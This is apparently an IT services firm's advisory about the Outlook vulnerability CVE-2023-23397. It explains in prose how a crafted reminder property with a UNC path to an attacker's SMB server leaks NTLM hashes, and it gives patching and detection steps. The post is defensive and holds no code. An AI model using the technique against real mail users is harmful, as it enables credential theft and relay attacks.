A critical Microsoft Outlook vulnerability for Windows (CVE-2023-23397) that enables remote password hash theft by just receiving an email has been disclosed by security experts.

Microsoft issued a solution for the security vulnerability on Tuesday. All Windows versions of Microsoft Outlook are impacted by the 9.8 severity-rated privilege escalation vulnerability.

Via the use of a simple phishing email, an attacker can utilize it to steal NTLM credentials from the target. There is no requirement for user interaction as this exploitation occurs when Outlook is open and the reminder is triggered on the system.

Critical Microsoft Outlook Vulnerability
Our Journey With WAGS

Simple Exploitation

Using hashed login credentials, Windows New technology LAN Manager (NTLM) is a form of authentication for Windows domains.

Despite the recognized concerns, NTLM authentication is nevertheless employed on new systems to maintain compatibility with legacy systems.

It operates using password hashes that a client sends to a server when attempting to access a shared resource, such SMB shares. These hashes can be used to authenticate on the network if they are stolen.

Microsoft explained that delivering “a message with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server” will allow an attacker to leverage CVE-2023-23397 to collect NTLM hashes.

“The connection to the remote SMB server sends the user’s NTLM negotiation message, which the attacker can then relay for authentication against other systems that support NTLM authentication” – Microsoft

Our Journey With WAGS

What You Should Do

This is a critical Microsoft Outlook vulnerability, and we recommend immediate action.

Microsoft provides a script CVE-2023-23397.ps1 that will check on-prem and Online mailboxes for all instances of the PidLidReminderFileParameter property. When completed, a CSV will be created if any were found. In the PidLidReminderFileParameter column, you will want to look for anything that may point externally. You may see reminder.wav type entries and those will be ok. You don’t want to see anything going to host.domain.com or an IP address. If any are found, keep those in a CSV and run the script again instructing it to clean.

It is strongly advised for administrators to prioritize fixing CVE-2023-23397 and to utilize Microsoft’s script to look for indications of exploitation by confirming whether messaging objects in Exchange have a UNC path.

Because they don’t support NTLM authentication, online services like Microsoft 365 are not exposed to this vulnerability.

Mirazon will be glad to assist in any way necessary to help keep your business and IT environment protected through the use of Layered Security Strategy. Reach out to us if you’d like to learn more by using the information below!

If you’d like assistance dealing with this critical Microsoft Outlook vulnerability, please contact us and call (502) 240-0404 or email us at  info@mirazon.com.